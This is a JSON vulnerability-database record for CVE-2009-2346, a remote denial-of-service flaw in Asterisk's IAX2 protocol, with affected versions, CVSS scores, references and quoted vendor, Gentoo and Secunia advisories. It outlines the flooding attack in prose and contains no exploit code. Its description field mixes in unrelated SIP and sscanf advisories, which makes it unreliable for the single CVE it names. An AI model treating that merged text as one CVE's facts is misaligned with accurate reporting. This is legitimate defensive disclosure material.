"version": "1.6.1"
},
{
"model": "asterisk",
"scope": "eq",
"trust": 0.3,
"vendor": "asterisk",
"version": "1.6.1.5"
},
{
"model": "asterisk",
"scope": "eq",
"trust": 0.3,
"vendor": "asterisk",
"version": "1.6.1"
},
{
"model": "beta6",
"scope": "eq",
"trust": 0.3,
"vendor": "asterisk",
"version": "1.6"
},
{
"model": "asterisk",
"scope": "eq",
"trust": 0.3,
"vendor": "asterisk",
"version": "1.66"
},
{
"model": "asterisk",
"scope": "eq",
"trust": 0.3,
"vendor": "asterisk",
"version": "1.6.8"
},
{
"model": "asterisk",
"scope": "eq",
"trust": 0.3,
"vendor": "asterisk",
"version": "1.4.26"
},
{
"model": "asterisk",
"scope": "eq",
"trust": 0.3,
"vendor": "asterisk",
"version": "1.4.24.1"
},
{
"model": "asterisk",
"scope": "eq",
"trust": 0.3,
"vendor": "asterisk",
"version": "1.4.24"
},
{
"model": "asterisk",
"scope": "eq",
"trust": 0.3,
"vendor": "asterisk",
"version": "1.4.23.2"
},
{
"model": "asterisk",
"scope": "eq",
"trust": 0.3,
"vendor": "asterisk",
"version": "1.4.23.1"
},
{
"model": "asterisk",
"scope": "eq",
"trust": 0.3,
"vendor": "asterisk",
"version": "1.4.23"
},
{
"model": "asterisk",
"scope": "eq",
"trust": 0.3,
"vendor": "asterisk",
"version": "1.4.22"
},
{
"model": "asterisk",
"scope": "eq",
"trust": 0.3,
"vendor": "asterisk",
"version": "1.4.19.1"
},
{
"model": "-rc3",
"scope": "eq",
"trust": 0.3,
"vendor": "asterisk",
"version": "1.4.19"
},
{
"model": "asterisk",
"scope": "eq",
"trust": 0.3,
"vendor": "asterisk",
"version": "1.4.19"
},
{
"model": "asterisk",
"scope": "eq",
"trust": 0.3,
"vendor": "asterisk",
"version": "1.4.18"
},
{
"model": "asterisk",
"scope": "eq",
"trust": 0.3,
"vendor": "asterisk",
"version": "1.4.17"
},
{
"model": "asterisk",
"scope": "eq",
"trust": 0.3,
"vendor": "asterisk",
"version": "1.4.16"
},
{
"model": "asterisk",
"scope": "eq",
"trust": 0.3,
"vendor": "asterisk",
"version": "1.4.15"
},
{
"model": "asterisk",
"scope": "eq",
"trust": 0.3,
"vendor": "asterisk",
"version": "1.4.14"
},
{
"model": "asterisk",
"scope": "eq",
"trust": 0.3,
"vendor": "asterisk",
"version": "1.4.13"
},
{
"model": "asterisk",
"scope": "eq",
"trust": 0.3,
"vendor": "asterisk",
"version": "1.4.12"
},
{
"model": "asterisk",
"scope": "eq",
"trust": 0.3,
"vendor": "asterisk",
"version": "1.4.11"
},
{
"model": "asterisk",
"scope": "eq",
"trust": 0.3,
"vendor": "asterisk",
"version": "1.4.10"
},
{
"model": "asterisk",
"scope": "eq",
"trust": 0.3,
"vendor": "asterisk",
"version": "1.4.9"
},
{
"model": "asterisk",
"scope": "eq",
"trust": 0.3,
"vendor": "asterisk",
"version": "1.4.8"
},
{
"model": "asterisk",
"scope": "eq",
"trust": 0.3,
"vendor": "asterisk",
"version": "1.4.7"
},
{
"model": "asterisk",
"scope": "eq",
"trust": 0.3,
"vendor": "asterisk",
"version": "1.4.6"
},
{
"model": "asterisk",
"scope": "eq",
"trust": 0.3,
"vendor": "asterisk",
"version": "1.4.5"
},
{
"model": "asterisk",
"scope": "eq",
"trust": 0.3,
"vendor": "asterisk",
"version": "1.4.4"
},
{
"model": "asterisk",
"scope": "eq",
"trust": 0.3,
"vendor": "asterisk",
"version": "1.4.3"
},
{
"model": "asterisk",
"scope": "eq",
"trust": 0.3,
"vendor": "asterisk",
"version": "1.4.2"
},
{
"model": "asterisk",
"scope": "eq",
"trust": 0.3,
"vendor": "asterisk",
"version": "1.4.1"
},
{
"model": "asterisk",
"scope": "eq",
"trust": 0.3,
"vendor": "asterisk",
"version": "1.2.34"
},
{
"model": "asterisk",
"scope": "eq",
"trust": 0.3,
"vendor": "asterisk",
"version": "1.2.33"
},
{
"model": "asterisk",
"scope": "eq",
"trust": 0.3,
"vendor": "asterisk",
"version": "1.2.32"
},
{
"model": "asterisk",
"scope": "eq",
"trust": 0.3,
"vendor": "asterisk",
"version": "1.2.31"
},
{
"model": "asterisk",
"scope": "eq",
"trust": 0.3,
"vendor": "asterisk",
"version": "1.2.30"
},
{
"model": "asterisk",
"scope": "eq",
"trust": 0.3,
"vendor": "asterisk",
"version": "1.2.29"
},
{
"model": "asterisk",
"scope": "eq",
"trust": 0.3,
"vendor": "asterisk",
"version": "1.2.28"
},
{
"model": "asterisk",
"scope": "eq",
"trust": 0.3,
"vendor": "asterisk",
"version": "1.2.27"
},
{
"model": "asterisk",
"scope": "eq",
"trust": 0.3,
"vendor": "asterisk",
"version": "1.2.26"
},
{
"model": "asterisk",
"scope": "eq",
"trust": 0.3,
"vendor": "asterisk",
"version": "1.2.25"
},
{
"model": "asterisk",
"scope": "eq",
"trust": 0.3,
"vendor": "asterisk",
"version": "1.2.24"
},
{
"model": "asterisk",
"scope": "eq",
"trust": 0.3,
"vendor": "asterisk",
"version": "1.2.23"
},
{
"model": "asterisk",
"scope": "eq",
"trust": 0.3,
"vendor": "asterisk",
"version": "1.2.22"
},
{
"model": "asterisk",
"scope": "eq",
"trust": 0.3,
"vendor": "asterisk",
"version": "1.2.21"
},
{
"model": "asterisk",
"scope": "eq",
"trust": 0.3,
"vendor": "asterisk",
"version": "1.2.19"
},
{
"model": "asterisk",
"scope": "eq",
"trust": 0.3,
"vendor": "asterisk",
"version": "1.2.18"
},
{
"model": "asterisk",
"scope": "eq",
"trust": 0.3,
"vendor": "asterisk",
"version": "1.2.17"
},
{
"model": "asterisk",
"scope": "eq",
"trust": 0.3,
"vendor": "asterisk",
"version": "1.2.16"
},
{
"model": "asterisk",
"scope": "eq",
"trust": 0.3,
"vendor": "asterisk",
"version": "1.2.15"
},
{
"model": "asterisk",
"scope": "eq",
"trust": 0.3,
"vendor": "asterisk",
"version": "1.2.14"
},
{
"model": "asterisk",
"scope": "eq",
"trust": 0.3,
"vendor": "asterisk",
"version": "1.2.13"
},
{
"model": "asterisk",
"scope": "eq",
"trust": 0.3,
"vendor": "asterisk",
"version": "1.2.11"
},
{
"model": "asterisk",
"scope": "eq",
"trust": 0.3,
"vendor": "asterisk",
"version": "1.2.10"
},
{
"model": "asterisk",
"scope": "eq",
"trust": 0.3,
"vendor": "asterisk",
"version": "1.2.9"
},
{
"model": "asterisk",
"scope": "eq",
"trust": 0.3,
"vendor": "asterisk",
"version": "1.2.8"
},
{
"model": "asterisk",
"scope": "eq",
"trust": 0.3,
"vendor": "asterisk",
"version": "1.2.7"
},
{
"model": "asterisk",
"scope": "eq",
"trust": 0.3,
"vendor": "asterisk",
"version": "1.2.6"
},
{
"model": "asterisk",
"scope": "eq",
"trust": 0.3,
"vendor": "asterisk",
"version": "1.2.5"
},
{
"model": ".0-beta2",
"scope": "eq",
"trust": 0.3,
"vendor": "asterisk",
"version": "1.2"
},
{
"model": ".0-beta1",
"scope": "eq",
"trust": 0.3,
"vendor": "asterisk",
"version": "1.2"
},
{
"model": "asterisk",
"scope": "eq",
"trust": 0.3,
"vendor": "asterisk",
"version": "1.6.0.3"
},
{
"model": "asterisk",
"scope": "eq",
"trust": 0.3,
"vendor": "asterisk",
"version": "1.6.0.14"
},
{
"model": "asterisk",
"scope": "eq",
"trust": 0.3,
"vendor": "asterisk",
"version": "1.6"
},
{
"model": "asterisk",
"scope": "eq",
"trust": 0.3,
"vendor": "asterisk",
"version": "1.4.26.1"
},
{
"model": "asterisk",
"scope": "eq",
"trust": 0.3,
"vendor": "asterisk",
"version": "1.4.22.1"
},
{
"model": "asterisk",
"scope": "eq",
"trust": 0.3,
"vendor": "asterisk",
"version": "1.4.21.2"
},
{
"model": "asterisk",
"scope": "eq",
"trust": 0.3,
"vendor": "asterisk",
"version": "1.4.18.1"
},
{
"model": "revision",
"scope": "eq",
"trust": 0.3,
"vendor": "asterisk",
"version": "1.495946"
},
{
"model": "beta",
"scope": "eq",
"trust": 0.3,
"vendor": "asterisk",
"version": "1.4"
},
{
"model": "asterisk",
"scope": "eq",
"trust": 0.3,
"vendor": "asterisk",
"version": "1.2.30.4"
},
{
"model": "asterisk",
"scope": "eq",
"trust": 0.3,
"vendor": "asterisk",
"version": "1.2.30.3"
},
{
"model": "s800i appliance",
"scope": "ne",
"trust": 0.3,
"vendor": "asterisk",
"version": "1.3.0.3"
},
{
"model": "business edition c.3.1",
"scope": "ne",
"trust": 0.3,
"vendor": "asterisk",
"version": "1"
},
{
"model": "business edition c.2.4.3",
"scope": "ne",
"trust": 0.3,
"vendor": "asterisk",
"version": null
},
{
"model": "business edition b.2.5.10",
"scope": "ne",
"trust": 0.3,
"vendor": "asterisk",
"version": null
},
{
"model": "asterisk",
"scope": "ne",
"trust": 0.3,
"vendor": "asterisk",
"version": "1.6.1.6"
},
{
"model": "asterisk",
"scope": "ne",
"trust": 0.3,
"vendor": "asterisk",
"version": "1.2.35"
},
{
"model": "asterisk",
"scope": "ne",
"trust": 0.3,
"vendor": "asterisk",
"version": "1.6.0.15"
},
{
"model": "asterisk",
"scope": "ne",
"trust": 0.3,
"vendor": "asterisk",
"version": "1.4.26.2"
}
],
"sources": [
{
"db": "BID",
"id": "36275"
},
{
"db": "JVNDB",
"id": "JVNDB-2009-003591"
},
{
"db": "CNNVD",
"id": "CNNVD-200909-091"
},
{
"db": "NVD",
"id": "CVE-2009-2346"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"cpe_match": [
{
"cpe22Uri": "cpe:/h:digium:appliance_s800i",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/a:digium:asterisk",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/a:digium:open_source",
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2009-003591"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Russell Bryant russell@digium.com",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-200909-091"
}
],
"trust": 0.6
},
"cve": "CVE-2009-2346",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "COMPLETE",
"baseScore": 7.8,
"confidentialityImpact": "NONE",
"exploitabilityScore": 10.0,
"id": "CVE-2009-2346",
"impactScore": 6.9,
"integrityImpact": "NONE",
"severity": "HIGH",
"trust": 1.9,
"vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C",
"version": "2.0"
}
],
"cvssV3": [],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2009-2346",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "NVD",
"id": "CVE-2009-2346",
"trust": 0.8,
"value": "High"
},
{
"author": "CNNVD",
"id": "CNNVD-200909-091",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "VULMON",
"id": "CVE-2009-2346",
"trust": 0.1,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2009-2346"
},
{
"db": "JVNDB",
"id": "JVNDB-2009-003591"
},
{
"db": "CNNVD",
"id": "CNNVD-200909-091"
},
{
"db": "NVD",
"id": "CVE-2009-2346"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "The IAX2 protocol implementation in Asterisk Open Source 1.2.x before 1.2.35, 1.4.x before 1.4.26.2, 1.6.0.x before 1.6.0.15, and 1.6.1.x before 1.6.1.6; Business Edition B.x.x before B.2.5.10, C.2.x before C.2.4.3, and C.3.x before C.3.1.1; and s800i 1.3.x before 1.3.0.3 allows remote attackers to cause a denial of service (call-number exhaustion) by initiating many IAX2 message exchanges, a related issue to CVE-2008-3263. The problem is CVE-2008-3263 Related toBy a third party IAX2 Service operation disruption by starting message exchange ( Call number exhaustion ) There is a possibility of being put into a state. Asterisk is prone to a remote denial-of-service vulnerability because it fails to properly handle an excessive amount of call numbers. \nSuccessful exploits can cause the application to stop accepting connections, resulting in denial-of-service conditions for legitimate users. \n\nThe vulnerabilities are caused due to NULL-pointer dereference errors\nin the \"sip_uri_params_cmp()\" and \"sip_uri_headers_cmp()\" functions. \nThis can be exploited to crash the application via a SIP message\nlacking certain headers. \n\nSuccessful exploitation requires that the SIP channel driver is\nconfigured with the \"pedantic\" option enabled. \n\nPROVIDED AND/OR DISCOVERED BY:\nThe vendor credits bugs.digium.com user klaus3000. Asterisk Project Security Advisory - AST-2009-006\n\n +------------------------------------------------------------------------+\n | Product | Asterisk |\n |--------------------+---------------------------------------------------|\n | Summary | IAX2 Call Number Resource Exhaustion |\n |--------------------+---------------------------------------------------|\n | Nature of Advisory | Denial of Service |\n |--------------------+---------------------------------------------------|\n | Susceptibility | Remote unauthenticated sessions |\n |--------------------+---------------------------------------------------|\n | Severity | Major |\n |--------------------+---------------------------------------------------|\n | Exploits Known | Yes - Published by Blake Cornell \u003c blake AT |\n | | remoteorigin DOT com \u003e on voip0day.com |\n |--------------------+---------------------------------------------------|\n | Reported On | June 22, 2008 |\n |--------------------+---------------------------------------------------|\n | Reported By | Noam Rathaus \u003c noamr AT beyondsecurity DOT com \u003e, |\n | | with his SSD program, also by Blake Cornell |\n |--------------------+---------------------------------------------------|\n | Posted On | September 3, 2009 |\n |--------------------+---------------------------------------------------|\n | Last Updated On | September 3, 2009 |\n |--------------------+---------------------------------------------------|\n | Advisory Contact | Russell Bryant \u003c russell AT digium DOT com \u003e |\n |--------------------+---------------------------------------------------|\n | CVE Name | CVE-2009-2346 |\n +------------------------------------------------------------------------+\n\n +------------------------------------------------------------------------+\n | Description | The IAX2 protocol uses a call number to associate |\n | | messages with the call that they belong to. However, the |\n | | protocol defines the call number field in messages as a |\n | | fixed size 15 bit field. So, if all call numbers are in |\n | | use, no additional sessions can be handled. |\n | | |\n | | A call number gets created at the start of an IAX2 |\n | | message exchange. So, an attacker can send a large |\n | | number of messages and consume the call number space. |\n | | The attack is also possible using spoofed source IP |\n | | addresses as no handshake is required before a call |\n | | number is assigned. |\n +------------------------------------------------------------------------+\n\n +------------------------------------------------------------------------+\n | Resolution | Upgrade to a version of Asterisk listed in this document |\n | | as containing the IAX2 protocol security enhancements. In |\n | | addition to upgrading, administrators should consult the |\n | | users guide section of the IAX2 Security document |\n | | (IAX2-security.pdf), as well as the sample configuration |\n | | file for chan_iax2 that have been distributed with those |\n | | releases for assistance with new options that have been |\n | | provided. |\n +------------------------------------------------------------------------+\n\n +------------------------------------------------------------------------+\n | Discussion | A lot of time was spent trying to come up with a way to |\n | | resolve this issue in a way that was completely backwards |\n | | compatible. However, the final resolution ended up |\n | | requiring a modification to the IAX2 protocol. This |\n | | modification is referred to as call token validation. |\n | | Call token validation is used as a handshake before call |\n | | numbers are assigned to IAX2 connections. |\n | | |\n | | Call token validation by itself does not resolve the |\n | | issue. However, it does allow an IAX2 server to validate |\n | | that the source of the messages has not been spoofed. In |\n | | addition to call token validation, Asterisk now also has |\n | | the ability to limit the amount of call numbers assigned |\n | | to a given remote IP address. |\n | | |\n | | The combination of call token validation and call number |\n | | allocation limits is used to mitigate this denial of |\n | | service issue. |\n | | |\n | | An alternative approach to securing IAX2 would be to use |\n | | a security layer on top of IAX2, such as DTLS [RFC4347] |\n | | or IPsec [RFC4301]. All Rights Reserved. \n Permission is hereby granted to distribute and publish this advisory in its\n original, unaltered form. \n\n_______________________________________________\nFull-Disclosure - We believe in it. \nCharter: http://lists.grok.org.uk/full-disclosure-charter.html\nHosted and sponsored by Secunia - http://secunia.com/\n. This fixes some\nvulnerabilities, which can be exploited by malicious people to cause\na DoS (Denial of Service). - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\nGentoo Linux Security Advisory GLSA 201006-20\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n http://security.gentoo.org/\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n\n Severity: Normal\n Title: Asterisk: Multiple vulnerabilities\n Date: June 04, 2010\n Bugs: #281107, #283624, #284892, #295270\n ID: 201006-20\n\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n\nSynopsis\n========\n\nMultiple vulnerabilities in Asterisk might allow remote attackers to\ncause a Denial of Service condition, or conduct other attacks. \n\nAffected packages\n=================\n\n -------------------------------------------------------------------\n Package / Vulnerable / Unaffected\n -------------------------------------------------------------------\n 1 net-misc/asterisk \u003c 1.2.37 \u003e= 1.2.37\n\nDescription\n===========\n\nMultiple vulnerabilities have been reported in Asterisk:\n\n* Nick Baggott reported that Asterisk does not properly process\n overly long ASCII strings in various packets (CVE-2009-2726). \n\n* Noam Rathaus and Blake Cornell reported a flaw in the IAX2 protocol\n implementation (CVE-2009-2346). \n\n* amorsen reported an input processing error in the RTP protocol\n implementation (CVE-2009-4055). \n\n* Patrik Karlsson reported an information disclosure flaw related to\n the REGISTER message (CVE-2009-3727). \n\n* A vulnerability was found in the bundled Prototype JavaScript\n library, related to AJAX calls (CVE-2008-7220). \n\nImpact\n======\n\nA remote attacker could exploit these vulnerabilities by sending a\nspecially crafted package, possibly causing a Denial of Service\ncondition, or resulting in information disclosure. \n\nWorkaround\n==========\n\nThere is no known workaround at this time. \n\nResolution\n==========\n\nAll Asterisk users should upgrade to the latest version:\n\n # emerge --sync\n # emerge --ask --oneshot --verbose \"\u003e=net-misc/asterisk-1.2.37\"\n\nNOTE: This is a legacy GLSA. Updates for all affected architectures are\navailable since January 5, 2010. It is likely that your system is\nalready no longer affected by this issue. \n\nReferences\n==========\n\n [ 1 ] CVE-2009-2726\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2726\n [ 2 ] CVE-2009-2346\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2346\n [ 3 ] CVE-2009-4055\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-4055\n [ 4 ] CVE-2009-3727\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3727\n [ 5 ] CVE-2008-7220\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-7220\n\nAvailability\n============\n\nThis GLSA and any updates to it are available for viewing at\nthe Gentoo Security Website:\n\n http://security.gentoo.org/glsa/glsa-201006-20.xml\n\nConcerns?\n=========\n\nSecurity is a primary focus of Gentoo Linux and ensuring the\nconfidentiality and security of our users machines is of utmost\nimportance to us. Any security concerns should be addressed to\nsecurity@gentoo.org or alternatively, you may file a bug at\nhttps://bugs.gentoo.org. \n\nLicense\n=======\n\nCopyright 2010 Gentoo Foundation, Inc; referenced text\nbelongs to its owner(s). \n\nThe contents of this document are licensed under the\nCreative Commons - Attribution / Share Alike license. \n\nhttp://creativecommons.org/licenses/by-sa/2.5\n. ----------------------------------------------------------------------\n\nDo you have VARM strategy implemented?\n\n(Vulnerability Assessment Remediation Management) \n\nIf not, then implement it through the most reliable vulnerability\nintelligence source on the market. \n\nImplement it through Secunia. \n\nFor more information visit:\nhttp://secunia.com/advisories/business_solutions/\n\nAlternatively request a call from a Secunia representative today to\ndiscuss how we can help you with our capabilities contact us at:\nsales@secunia.com\n\n----------------------------------------------------------------------\n\nTITLE:\nAsterisk IAX2 Call Number Exhaustion Denial of Service\n\nSECUNIA ADVISORY ID:\nSA36593\n\nVERIFY ADVISORY:\nhttp://secunia.com/advisories/36593/\n\nDESCRIPTION:\nA vulnerability has been reported in Asterisk, which can be exploited\nby malicious people to cause a DoS (Denial of Service). \n\nS800i (Asterisk Appliance):\nUpdate to version 1.3.0.3. \n\nPROVIDED AND/OR DISCOVERED BY:\nThe vendor credits:\n* Noam Rathaus\n* Blake Cornell\n\nORIGINAL ADVISORY:\nhttp://downloads.asterisk.org/pub/security/AST-2009-006.html\n\n----------------------------------------------------------------------\n\nAbout:\nThis Advisory was delivered by Secunia as a free service to help\neverybody keeping their systems up to date against the latest\nvulnerabilities. \n\nSubscribe:\nhttp://secunia.com/advisories/secunia_security_advisories/\n\nDefinitions: (Criticality, Where etc.)\nhttp://secunia.com/advisories/about_secunia_advisories/\n\n\nPlease Note:\nSecunia recommends that you verify all advisories you receive by\nclicking the link. \nSecunia NEVER sends attached files with advisories. \nSecunia does not advise people to install third party patches, only\nuse those supplied by the vendor. \n\n----------------------------------------------------------------------\n\nUnsubscribe: Secunia Security Advisories\nhttp://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org\n\n----------------------------------------------------------------------\n\n\n. \n\nThe vulnerabilities are caused due to \"sscanf()\" being invoked\nwithout specifying a maximum width e.g. when processing SIP messages. \nThis can be exploited to exhaust stack memory in the SIP stack network\nthread via overly long numeric strings in various fields of a\nmessage. \n\nNOTE: According to the vendor this is only potentially exploitable in\n1.6.1 and above",
"sources": [
{
"db": "NVD",
"id": "CVE-2009-2346"
},
{
"db": "JVNDB",
"id": "JVNDB-2009-003591"
},
{
"db": "BID",
"id": "36275"
},
{
"db": "VULMON",
"id": "CVE-2009-2346"
},
{
"db": "PACKETSTORM",
"id": "75661"
},
{
"db": "PACKETSTORM",
"id": "80978"
},
{
"db": "PACKETSTORM",
"id": "81677"
},
{
"db": "PACKETSTORM",
"id": "90288"
},
{
"db": "PACKETSTORM",
"id": "81003"
},
{
"db": "PACKETSTORM",
"id": "80408"
}
],
"trust": 2.52
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2009-2346",
"trust": 3.0
},
{
"db": "BID",
"id": "36275",
"trust": 2.0
},
{
"db": "SECUNIA",
"id": "36593",
"trust": 1.8
},
{
"db": "SECTRACK",
"id": "1022819",
"trust": 1.6
},
{
"db": "JVNDB",
"id": "JVNDB-2009-003591",
"trust": 0.8
},
{
"db": "BUGTRAQ",
"id": "20090903 AST-2009-006: IAX2 CALL NUMBER RESOURCE EXHAUSTION",
"trust": 0.6
},
{
"db": "CNNVD",
"id": "CNNVD-200909-091",
"trust": 0.6
},
{
"db": "VULMON",
"id": "CVE-2009-2346",
"trust": 0.1
},
{
"db": "SECUNIA",
"id": "34229",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "75661",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "80978",
"trust": 0.1
},
{
"db": "SECUNIA",
"id": "36889",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "81677",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "90288",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "81003",
"trust": 0.1
},
{
"db": "SECUNIA",
"id": "36227",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "80408",
"trust": 0.1
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2009-2346"
},
{
"db": "BID",
"id": "36275"
},
{
"db": "JVNDB",
"id": "JVNDB-2009-003591"
},
{
"db": "PACKETSTORM",
"id": "75661"
},
{
"db": "PACKETSTORM",
"id": "80978"
},
{
"db": "PACKETSTORM",
"id": "81677"
},
{
"db": "PACKETSTORM",
"id": "90288"
},
{
"db": "PACKETSTORM",
"id": "81003"
},
{
"db": "PACKETSTORM",
"id": "80408"
},
{
"db": "CNNVD",
"id": "CNNVD-200909-091"
},
{
"db": "NVD",
"id": "CVE-2009-2346"
}
]
},
"id": "VAR-200909-0357",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VARIoT devices database",
"id": null
}
],
"trust": 0.19659443
},
"last_update_date": "2025-04-10T20:42:40.164000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "AST-2009-006",
"trust": 0.8,
"url": "http://downloads.asterisk.org/pub/security/AST-2009-006.html"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2009-003591"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-119",
"trust": 1.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2009-003591"
},
{
"db": "NVD",
"id": "CVE-2009-2346"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.1,
"url": "http://downloads.asterisk.org/pub/security/ast-2009-006.html"
},
{
"trust": 1.8,
"url": "http://www.securityfocus.com/bid/36275"
},
{
"trust": 1.7,
"url": "http://secunia.com/advisories/36593"
},
{
"trust": 1.7,
"url": "http://securitytracker.com/id?1022819"
},
{
"trust": 1.1,
"url": "http://www.securityfocus.com/archive/1/506257/100/0/threaded"
},
{
"trust": 0.9,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2009-2346"
},
{
"trust": 0.8,
"url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2009-2346"
},
{
"trust": 0.6,
"url": "http://www.securityfocus.com/archive/1/archive/1/506257/100/0/threaded"
},
{
"trust": 0.4,
"url": "http://secunia.com/advisories/secunia_security_advisories/"
},
{
"trust": 0.4,
"url": "http://secunia.com/advisories/business_solutions/"
},
{
"trust": 0.4,
"url": "http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org"
},
{
"trust": 0.4,
"url": "http://secunia.com/advisories/about_secunia_advisories/"
},
{
"trust": 0.3,
"url": "http://www.asterisk.org/"
},
{
"trust": 0.3,
"url": "/archive/1/506257"
},
{
"trust": 0.2,
"url": "http://secunia.com/advisories/34229/"
},
{
"trust": 0.2,
"url": "http://downloads.asterisk.org/pub/security/ast-2009-006-1.2.diff.txt"
},
{
"trust": 0.2,
"url": "http://downloads.asterisk.org/pub/security/ast-2009-006-1.4.diff.txt"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2009-2346"
},
{
"trust": 0.2,
"url": "http://secunia.com/advisories/36227/"
},
{
"trust": 0.2,
"url": "http://secunia.com/advisories/36593/"
},
{
"trust": 0.1,
"url": "https://cwe.mitre.org/data/definitions/119.html"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov"
},
{
"trust": 0.1,
"url": "http://downloads.digium.com/pub/security/ast-2009-002.html"
},
{
"trust": 0.1,
"url": "http://secunia.com/advisories/try_vi/"
},
{
"trust": 0.1,
"url": "https://issues.asterisk.org/view.php?id=12912"
},
{
"trust": 0.1,
"url": "http://downloads.digium.com/pub/security/ast-2009-006.html"
},
{
"trust": 0.1,
"url": "http://downloads.asterisk.org/pub/security/ast-2009-006-1.6.0.diff.txt|1.6.0"
},
{
"trust": 0.1,
"url": "http://www.beyondsecurity.com/ssd.html"
},
{
"trust": 0.1,
"url": "http://www.rfc-editor.org/authors/rfc5456.txt"
},
{
"trust": 0.1,
"url": "http://www.asterisk.org/security"
},
{
"trust": 0.1,
"url": "http://secunia.com/"
},
{
"trust": 0.1,
"url": "http://downloads.asterisk.org/pub/security/ast-2009-006-1.6.1.diff.txt|1.6.1"
},
{
"trust": 0.1,
"url": "http://downloads.digium.com/pub/security/ast-2009-006.pdf"
},
{
"trust": 0.1,
"url": "http://lists.grok.org.uk/full-disclosure-charter.html"
},
{
"trust": 0.1,
"url": "http://secunia.com/advisories/36889/"
},
{
"trust": 0.1,
"url": "https://www.redhat.com/archives/fedora-package-announce/2009-september/msg00783.html"
},
{
"trust": 0.1,
"url": "http://creativecommons.org/licenses/by-sa/2.5"
},
{
"trust": 0.1,
"url": "https://bugs.gentoo.org."
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2009-4055"
},
{
"trust": 0.1,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2009-3727"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2009-3727"
},
{
"trust": 0.1,
"url": "http://security.gentoo.org/glsa/glsa-201006-20.xml"
},
{
"trust": 0.1,
